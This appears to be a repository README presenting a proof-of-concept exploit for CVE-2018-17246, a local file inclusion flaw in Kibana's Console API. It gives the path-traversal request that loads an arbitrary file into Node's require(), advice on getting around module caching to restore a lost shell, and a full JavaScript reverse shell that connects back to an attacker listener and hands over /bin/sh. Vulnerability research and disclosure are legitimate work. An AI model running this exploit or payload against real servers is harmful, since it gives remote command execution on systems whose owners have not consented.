CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13

Repository: mpgn. Latest commit 4e657eb, Oct 26, 2019: Merge pull request #1 from chooper/chooper/add-helpful-tip (Add a helpful note about node.js module caching).

A Local File Inclusion in Kibana, found by CyberArk Labs. Kibana's Console API passes the user-supplied `apis` parameter straight into Node's `require()`, so any JavaScript file on the Kibana server can be loaded and executed by the Kibana process. The LFI can be used to get a reverse shell on the Kibana server with the following request:

```
/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../path/to/shell.js
```

As you have probably guessed, this attack needs to be paired with an unrestricted file upload or any other vulnerability that lets you write a file on the server. The file only has to be readable by the user Kibana runs as; it does not need to live inside the Kibana tree.

There is no input validation, so the name of the JavaScript file can be anything we want, and with path traversal we can pick any file on the Kibana server. One thing to be aware of, however, is Node's module caching. The LFI works by sending unsanitized user input to Node's `require()`, and `require()` caches every loaded module in `require.cache`, keyed by the resolved absolute filename. The included module (the attacker's payload) therefore executes only on the first request: sending the same payload again, even with a different traversal string that resolves to the same file, returns the cached module without running it. To recover a lost reverse shell you have to write the payload under a new filename and include that one instead (or wait for the Kibana process to restart, which empties the cache).


Vulnerability details: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/

Security Advisory: https://www.elastic.co/blog/kibana-local-file-inclusion-flaw-cve-2018-17246

Reverse shell payload (`shell.js`, the file written to the server and then included through the LFI above; 172.18.0.1:1337 is the attacker's listener):

```javascript
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);              // shell whose stdio is wired to the socket below
    var client = new net.Socket();
    client.connect(1337, "172.18.0.1", function(){ // connect back to the attacker's listener
        client.pipe(sh.stdin);                     // bytes from the attacker -> shell stdin
        sh.stdout.pipe(client);                    // shell stdout/stderr -> attacker
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
```